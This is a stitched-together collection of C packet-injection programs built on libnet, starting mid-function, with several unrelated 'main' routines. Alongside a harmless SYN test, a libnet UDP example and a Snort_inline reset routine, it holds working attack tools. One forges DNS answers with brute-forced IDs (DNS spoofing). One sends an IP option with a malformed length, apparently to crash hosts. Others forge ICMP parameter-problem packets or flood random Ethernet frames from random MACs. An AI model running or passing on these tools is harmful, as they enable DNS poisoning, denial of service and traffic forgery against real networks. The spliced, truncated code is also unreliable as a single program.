libnet_host_lookup(ip->ip_dst.s_addr, 0), libnet_host_lookup(ip->ip_src.s_addr, 0)); } /* Send tiny window advertisement. */ ip->ip_hl = 5; ip->ip_len = htons(IP_H + TCP_H); ip->ip_id = libnet_get_prand(PRu16); memcpy(buf, (u_char *)ip, IP_H); tcp->th_off = 5; tcp->th_win = htons(nice); memcpy(buf + IP_H, (u_char *)tcp, TCP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); len = IP_H + TCP_H; if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), nice); } } }
int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp, *buf; printf("TCP packet building/writing test\n"); src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Get our block of memory for the packet. In this case, we only need * memory for the packet headers. */ buf = malloc(IP_MAXPACKET); if (!buf) { perror("No memory for packet header"); exit(EXIT_FAILURE); } /* * Open our raw IP socket and set IP_HDRINCL. */ sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } /* * Build the IP header (shown exploded for commenting). */ libnet_build_ip(LIBNET_TCP_H, /* Size of the payload */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */ 242, /* IP ID */ 0, /* Frag stuff */ 48, /* TTL */ IPPROTO_TCP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf); /* Packet header memory */ /* * Build the TCP header. */ libnet_build_tcp(src_prt, /* Source TCP port */ dst_prt, /* Destination TCP port */ 11111, /* Sequence number */ 99999, /* Acknowledgement number */ TH_SYN, /* Control flags */ 1024, /* Window size */ 0, /* Urgent pointer */ NULL, /* Pointer to payload (none) */ 0, buf + LIBNET_IP_H); /* Packet header memory */ /* * Calculate the TCP header checksum (IP header checksum is *always* done * by the kernel. */ libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H); /* * Write the packet to the network. */ c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H); if (c < LIBNET_TCP_H + LIBNET_IP_H) { fprintf(stderr, "libnet_write_ip\n"); } printf("Completed, wrote %d bytes\n", c); free(buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int i, /* loop counter */ written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ npackets, /* num of packet to write */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 7) { printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); npackets = (int) atoi(argv[6]); payload = /* question section name/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, names/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, ttl, size: 4 */ "\xff\xff\xff\xff" /* answer section, rdata length, size: 2 */ "\x00\x04" /* answer section, rdata, size: 4 */ "\x81\x51\xe0\x43"; payload_size = 52; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 10951, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ payload_size + 12, /* payload length */ packet + LIBNET_IP_H); /* * write npackets * we loop from here because we must change the dns id and also re-checksum */ printf("\nwriting packets"); for (i = 0; i < npackets; i++) { printf("."); /* * dns header construction */ libnet_build_dns(id+i, /* dns id */ 0x8180, /* control flags */ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); } /* * cleanup */ libnet_destroy_packet(&packet); if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); printf("\n"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0; u_long *problem = NULL; u_char *packet = NULL; int sock, c, len = 0; long acx, count = 1; struct icmp *icmp; struct ip *ip; /* It appears that most IP options of length >0 will work * Works with 128, 64, 32, 16... And the normal ones 137... * Does not work with 0, 1 */ u_char data[] = {137}; int data_len = sizeof(data); printf("Written by Mike Frantzen... <*****@*****.**>\n"); printf("For test purposes only... yada yada yada...\n"); src_ip = inet_addr("10.10.10.10"); while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) { switch(c) { case 'd': dst_ip = libnet_name_resolve(optarg, 1); break; case 's': src_ip = libnet_name_resolve(optarg, 1); break; case 'D': ins_dst_ip = name_resolve(optarg, 1); break; case 'S': ins_src_ip = name_resolve(optarg, 1); break; case 'l': data_len = atoi(optarg); break; case 'c': if ( (count = atol(optarg)) < 1) count = 1; break; default: printf("Don't understand option.\n"); exit(-1); } } if ( dst_ip == 0 ) { printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n", rindex(argv[0], '/') == NULL ? argv[0] : rindex(argv[0], '/') + 1); printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n"); printf("\t\t[-l <data length>]\t[-c <# to send>]\n"); exit(-1); } if ( ins_dst_ip == 0 ) ins_dst_ip = src_ip; if ( ins_src_ip == 0 ) ins_src_ip = dst_ip; if ( (packet = malloc(1500)) == NULL ) { perror("malloc: "); exit(-1); } if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { perror("socket: "); exit(-1); } /* 8 is the length of the ICMP header with the problem field */ len = 8 + IP_H + data_len; bzero(packet + IP_H, len); libnet_build_ip(len, /* Size of the payload */ 0xc2, /* IP tos */ 30241, /* IP ID */ 0, /* Frag Offset & Flags */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload */ 0, packet); /* Packet memory */ /* ICMP Header for Parameter Problem * --------------+---------------+---------------+--------------- *| Type (12) | Code (0) | Checksum | * --------------+---------------+---------------+--------------- *| Pointer | unused | * --------------+---------------+---------------+--------------- * Internet Header + 64 bits of original datagram data.... */ icmp = (struct icmp *) (packet + IP_H); problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */ icmp->icmp_type = ICMP_PARAMPROB; icmp->icmp_code = 0; /* Indicates a problem pointer */ *problem = htonl(0x14000000); /* Problem is 20 bytes into it */ /* Need to embed an IP packet within the ICMP */ ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */ ip->ip_v = 0x4; /* IPV4 */ ip->ip_hl = 0xf; /* Some IP Options */ ip->ip_tos = 0xa3; /* Whatever */ ip->ip_len = htons(data_len); /* Length of packet */ ip->ip_id = 30241; /* Whatever */ ip->ip_off = 0; /* No frag's */ ip->ip_ttl = 32; /* Whatever */ ip->ip_p = 98; /* Random protocol */ ip->ip_sum = 0; /* Will calc later */ ip->ip_src.s_addr = ins_src_ip; ip->ip_dst.s_addr = ins_dst_ip; /* Move our data block into the packet */ bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); /* I hate checksuming. Spent a day trying to get it to work in * perl... That sucked... Tequilla would have helped immensly. */ libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len); /* Bah... See above comment.... */ libnet_do_checksum(packet, IPPROTO_ICMP, len); printf("Sending %li packets", count); for (acx = 0; acx < count; acx++) { if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H)) perror("write_ip: "); else printf("."); } printf("\n\n"); return( 0 ); }
int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; char *device = NULL; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct tcphdr *TCP; u_int32_t src = 0, dst = 0; banner(); if (argc < 4) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved source address\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved destination address\n"); exit(-1); } if ( (buf = malloc(IP_MAXPACKET)) == NULL ) { perror("malloc"); exit(-1); } buf[20] = atoi(argv[3]); buf[21] = 39; // our malformed size for (c = 0; c<38; c+=3) strncpy(&buf[22+c], "ECL", 3); // padding TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX); TCP->th_off = 5; packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2); srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_TCP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; TCP->th_sport = htons(1337); TCP->th_dport = htons(80); TCP->th_seq = 0; TCP->th_ack = 0; TCP->th_x2 = 0; TCP->th_flags = TH_SYN; TCP->th_win = rand() & 0xffff; TCP->th_sum = 0; TCP->th_urp = 0; libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("Packet sent.\n"); libnet_destroy(l); free(buf); return (0); }
int main(int argc, char **argv) { u_char compare[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; u_char dhost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; u_char shost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; struct ether_header *ether = NULL; u_int16_t proto = htons(ETHERTYPE_IP); struct ether_addr *ea = NULL; u_int16_t *data = NULL; char dev[128] = ""; u_char *buf = NULL; int proto_rand = 0; struct timeval tv, tv2; int max_len = ETHER_FRAME_SIZE; u_long count = 0xffffffffl; u_long data_pushed = 0; struct ip *ip = NULL; u_long data_len = 0; int rand_source = 0; int rand_dest = 0; long mark = 1000; u_long skip = 0; /* Skip how many packets */ u_long acx = 0; int debug = 0; u_int len = 0; u_int cx = 0; float sec; int seed; u_int c; /* libnet variables */ char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; seed = getpid(); while((c=getopt(argc, argv, "hi:s:d:k:p:r:c:l:Dvm:")) != (unsigned) EOF) { switch (c) { case 'i': if (rindex(optarg, '/')) strncpy(dev, (char *) rindex(optarg, '/')+1, 128); else strncpy(dev, optarg, 128); dev[127] = '\0'; break; case 's': if ( strcmp(optarg, "rand") == 0 ) { printf("Using random source MAC's\n"); shost[0] = 0xff; rand_source = 1; break; } bcopy(atoether(optarg), shost, 6); break; case 'd': if ( strcmp(optarg, "rand") == 0 ) { printf("Using random destination MAC's\n"); dhost[0] = 0xff; rand_dest = 1; break; } bcopy(atoether(optarg), dhost, 6); break; case 'r': seed = atoi(optarg); break; case 'c': count = atol(optarg); break; case 'm': mark = atol(optarg); if (mark <= 0) exit(printf("Please use a positive arg for -m\n")); break; case 'k': skip = atol(optarg); printf("Will not transmit first %li packet(s).\n", skip); break; case 'D': debug++; break; case 'l': max_len = atoi(optarg); if ( max_len > 1500 ) { printf("Maximum Length of %i is longer than the max " "ethernet frame size of %i\n", max_len, ETHER_FRAME_SIZE); exit(0); } if ( max_len < 14) { printf("You seam to have entered %i as the maximum " "length... Please make it >= 14\n", max_len); exit(0); } break; case 'p': if ( strcasecmp(optarg, "rand") == 0 ) { proto_rand++; break; } proto_rand = 0; proto = htons(atoi(optarg)); break; case 'v': printf("Version %s\n", VERSION); exit(0); case 'h': default: usage(argv[0]); exit( 0 ); } } if ( *dev == '\0' ) { usage(argv[0]); exit( 0 ); } /* Initialize libnet context, Root priviledges are required.*/ l = libnet_init( LIBNET_LINK_ADV, /* injection type */ dev, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "Can not initialize libnet: %s", errbuf); exit( -1 ); } max_len -= 6 + 6 + 2; printf("Seeding with %i\n", seed); srand(seed); if ( (buf = malloc(ETHER_FRAME_SIZE)) == NULL ) { perror("malloc"); exit( -1 ); } bzero(buf, ETHER_FRAME_SIZE); ether = (struct ether_header *) buf; if ( bcmp(dhost, compare, 6) == 0 ) memset(ether->ether_dhost, 0xff, 6); else bcopy(dhost, ether->ether_dhost, 6); if ( bcmp(shost, compare, 6) == 0 ) { if ( (ea = (struct ether_addr *)libnet_get_hwaddr(l)) == 0 ) fprintf(stderr, "Cannot get MAC for %s: %s", dev, libnet_geterror(l)); bcopy(ea, ether->ether_shost, 6); } else bcopy(shost, ether->ether_shost, 6); printf("Maximum packet size (minus header) is %i bytes\n", max_len); if ( proto_rand ) printf("Ethernet protocols will be randomized.\n"); else printf("Ethernet protocol will be %i.\n", ntohs(proto)); if ( !rand_dest ) printf("Sending to MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", ether->ether_dhost[0], ether->ether_dhost[1], ether->ether_dhost[2], ether->ether_dhost[3], ether->ether_dhost[4], ether->ether_dhost[5]); else printf("Sending to random MAC addresses.\n"); if ( !rand_source ) printf("Sending from MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", ether->ether_shost[0], ether->ether_shost[1], ether->ether_shost[2], ether->ether_shost[3], ether->ether_shost[4], ether->ether_shost[5]); else printf("Sending from random MAC addresses.\n"); ip = (struct ip *) (buf + 14); data = (u_int16_t *) (buf + 14); printf("Sending...\n"); gettimeofday(&tv, NULL); for ( acx = 1; acx <= count; acx++ ) { len = sizeof(struct ether_header); if ( rand_source ) { ((u_int16_t *) ether->ether_shost)[0] = RAND16; ((u_int16_t *) ether->ether_shost)[1] = RAND16; ((u_int16_t *) ether->ether_shost)[2] = RAND16; } if ( rand_dest ) { ((u_int16_t *) ether->ether_dhost)[0] = RAND16; ((u_int16_t *) ether->ether_dhost)[1] = RAND16; ((u_int16_t *) ether->ether_dhost)[2] = RAND16; } if ( proto_rand ) ether->ether_type = RAND16; else ether->ether_type = proto; data_len = (u_int) (max_len * (rand()/((float) RAND_MAX + 1))); data_len >>= 1; for ( cx = 0; cx < data_len; cx++ ) data[cx] = RAND16; data_len <<= 1; if ( rand() & 0x1 ) { data_len++; data[cx] = RAND16; } len += data_len; ip->ip_len = htons(data_len); ip->ip_sum = 0; libnet_do_checksum(l, (u_int8_t *) ip, IPPROTO_IP, data_len); if ( debug ) { printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> ", ether->ether_shost[0], ether->ether_shost[1], ether->ether_shost[2], ether->ether_shost[3], ether->ether_shost[4], ether->ether_shost[5]); printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\t", ether->ether_dhost[0], ether->ether_dhost[1], ether->ether_dhost[2], ether->ether_dhost[3], ether->ether_dhost[4], ether->ether_dhost[5]); switch( ntohs(ether->ether_type) ) { case ETHERTYPE_IP: printf("Proto IP \t"); break; case ETHERTYPE_ARP: printf("Proto ARP \t"); break; case ETHERTYPE_PUP: printf("Proto PUP \t"); break; case ETHERTYPE_REVARP: printf("Proto RARP\t"); break; case ETHERTYPE_VLAN: printf("Proto VLAN\t"); break; default: printf("Proto %u\t", ntohs(ether->ether_type)); } printf("Length %i\n", len); } if ( acx >= skip ) { c = libnet_adv_write_link(l, buf, len); if (c !=(u_int) -1) data_pushed += c; } /* if ( c != len ) * perror("write_ll"); */ if ( !(acx % mark) ) { gettimeofday(&tv2, NULL); sec = (tv2.tv_sec - tv.tv_sec) - (tv.tv_usec - tv2.tv_usec) / 1000000.0; printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx, mark/sec, (data_pushed/1024.0)/sec ); data_pushed = 0; gettimeofday(&tv, NULL); } } if ((acx-1) % mark) { /* There is a remainder */ gettimeofday(&tv2, NULL); sec = (tv2.tv_sec - tv.tv_sec) - (tv.tv_usec - tv2.tv_usec) / 1000000.0; printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx-1, ((acx-1) % mark)/sec, (data_pushed/1024.0)/sec ); } libnet_destroy(l); free( buf ); return ( 0 ); }
static void RejectLayer2(ipq_packet_msg_t *m) { IPHdr *iph; TCPHdr *tcph; ICMPHdr *icmph; EtherHdr *eh; int proto; int size = 0; int payload_len = 0; /* pointer to the device to use: according to the libnet manpage * this should be u_char, but I get a compiler warning then. * Making it a char fixes that. VJ. */ char *device = NULL; /* to get the mac address of the interface when in layer2 mode */ struct ether_addr *link_addr; u_char enet_dst[6]; /* mac addr for creating the ethernet packet. */ u_char enet_src[6]; /* mac addr for creating the ethernet packet. */ struct libnet_link_int *network = NULL; /* pointer to link interface struct */ int i = 0; iph = (IPHdr *)(l_tcp + ETH_H); proto = tmpP->iph->ip_proto; iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; /* set the interface. For Nat/Ip-mode the device we use to send a reset to the offender * is the device on which the packet entered. For bridge-mode indev and outdev are always * equal, so we use indev as well. There is one rare exception to this... if on the Snort_ * inline box a client is run that causes a reset, indev is not set but outdev. */ if(m->indev_name[0] != '\0') device = m->indev_name; else device = m->outdev_name; /* Let's initialize Libnet */ if((network = libnet_open_link_interface(device, errbuf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface for device %s failed: %s\n", device, errbuf); return; } /* lets get the mac addr of the interface */ if(!(link_addr = libnet_get_hwaddr(network, device, errbuf))) { libnet_error(LIBNET_ERR_FATAL, "libnet_get_hwaddr failed: %s\n", errbuf); return; } /* copy the mac: the src is set the the interface mac * but only if the mac wasn't supplied in the configfile */ if(pv.enet_src[0] == 0 && pv.enet_src[1] == 0 && pv.enet_src[2] == 0 && pv.enet_src[3] == 0 && pv.enet_src[4] == 0 && pv.enet_src[5] == 0) { /* either user set mac as 00:00:00:00:00:00 or it is blank */ for(i = 0; i < 6; i++) enet_src[i] = link_addr->ether_addr_octet[i]; } else { for(i = 0; i < 6; i++) enet_src[i] = pv.enet_src[i]; } /* copy the mac: the old src now becomes dst */ for(i = 0; i < 6; i++) enet_dst[i] = m->hw_addr[i]; //printf("reset src mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0],enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]); //printf("reset dst mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0],enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]); switch(proto) { case IPPROTO_TCP: if (!tmpP->frag_flag) { size = ETH_H + IP_H + TCP_H; eh = (EtherHdr *)l_tcp; iph = (IPHdr *)(l_tcp + ETH_H); tcph = (TCPHdr *)(l_tcp + ETH_H + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; tcph->th_sport = tmpP->tcph->th_dport; tcph->th_dport = tmpP->tcph->th_sport; tcph->th_seq = tmpP->tcph->th_ack; tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1); //printf("Send TCP Rst in Bridge-mode.\n"); /* calculate the checksums */ if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_TCP, TCP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_do_checksum failed for TCP_H"); return; } if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_IP, IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_do_checksum failed for IP_H"); return; } /* build the ethernet packet */ if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_tcp) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_build_ethernet"); return; } /* finally write it to the link */ if(libnet_write_link_layer(network, device, l_tcp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_write_link_layer"); return; } } /* end if !tmpP->frag_flag */ break; case IPPROTO_UDP: if (!tmpP->frag_flag) { eh = (EtherHdr *)l_icmp; iph = (IPHdr *)(l_icmp + ETH_H); icmph = (ICMPHdr *) (l_icmp + ETH_H + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; if ((payload_len = ntohs(tmpP->iph->ip_len) - (IP_HLEN(tmpP->iph) << 2)) > 8) { payload_len = 8; } memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph, (IP_HLEN(tmpP->iph) << 2) + payload_len); size = ETH_H + IP_H + ICMP_UNREACH_H + (IP_HLEN(tmpP->iph) << 2) + payload_len; iph->ip_len = htons(size); /* calculate the checksums */ if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_ICMP, size - IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_do_checksum failed for IPPROTO_ICMP"); return; } if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_IP, IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_do_checksum failed for IPPROTO_IP"); return; } /* build the ethernet packet */ if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_icmp) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_build_ethernet"); return; } /* finally write it to the link */ //printf("Send ICMP Rst in Bridge-mode.\n"); if(libnet_write_link_layer(network, device, l_icmp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_write_link_layer"); return; } } break; } /* end switch(proto) */ /* clean up file-descriptors for the next time we call RejectLayer2 */ if((libnet_close_link_interface(network)) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "libnet_close_link_interface error\n"); } }
int main(int argc, char *argv[]) { int packet_size, /* size of our packet */ payload_size, /* size of our packet */ c; /* misc */ u_long src_ip, dst_ip; /* source ip, dest ip */ u_short bport, eport; /* beginning and end ports */ u_short cport; /* current port */ u_char payload[MAX_PAYLOAD_SIZE]; /* packet payload */ u_char *packet; /* pointer to our packet buffer */ char err_buf[LIBNET_ERRBUF_SIZE]; /* error buffer */ u_char *device; /* pointer to the device to use */ struct libnet_link_int *network; /* pointer to link interface struct */ struct libnet_plist_chain plist; /* plist chain */ struct libnet_plist_chain *plist_p; /* plist chain pointer */ printf("libnet example code:\tmodule 4\n\n"); printf("packet injection interface:\tlink layer\n"); printf("packet type:\t\t\tUDP [with payload] using port list chaining\n"); plist_p = NULL; device = NULL; src_ip = 0; dst_ip = 0; while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg); } break; case 'i': device = optarg; break; case 's': if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE))) { libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", optarg); } break; case 'p': plist_p = &plist; if (libnet_plist_chain_new(&plist_p, optarg) == -1) { libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n"); } break; default: usage(argv[0]); exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip || !plist_p) { usage(argv[0]); exit(EXIT_FAILURE); } c = argc - optind; if (c != 1) { usage(argv[0]); exit(EXIT_FAILURE); } memset(payload, 0, sizeof(payload)); strncpy(payload, argv[optind], strlen(argv[optind])); /* * Step 1: Network Initialization (interchangable with step 2). */ if (device == NULL) { struct sockaddr_in sin; /* * Try to locate a device. */ if (libnet_select_device(&sin, &device, err_buf) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf); } printf("device:\t\t\t\t%s\n", device); } if ((network = libnet_open_link_interface(device, err_buf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf); } /* * Get the payload from the user. Hrm. This might fail on a Sparc * if byte alignment is off... */ payload_size = strlen(payload); /* * We're going to build a UDP packet with a payload using the * link-layer API, so this time we need memory for a ethernet header * as well as memory for the ICMP and IP headers and our payload. */ packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size; /* * Step 2: Memory Initialization (interchangable with step 1). */ if (libnet_init_packet(packet_size, &packet) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); } /* * Step 3: Packet construction (ethernet header). */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet); /* * Step 3: Packet construction (IP header). */ libnet_build_ip(LIBNET_UDP_H + payload_size, 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_UDP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, packet + LIBNET_ETH_H); /* Packet header memory */ while (libnet_plist_chain_next_pair(plist_p, &bport, &eport)) { while (!(bport > eport) && bport != 0) { cport = bport++; /* * Step 3: Packet construction (UDP header). */ libnet_build_udp(242, /* source port */ cport, /* dest. port */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_ETH_H + LIBNET_IP_H); /* * Step 4: Packet checksums (ICMP header *AND* IP header). */ if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } /* * Step 5: Packet injection. */ c = libnet_write_link_layer(network, device, packet, packet_size); if (c < packet_size) { libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c); } else { printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport); } } } /* * Shut down the interface. */ if (libnet_close_link_interface(network) == -1) { libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface"); } /* * Free packet memory. */ libnet_destroy_packet(&packet); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
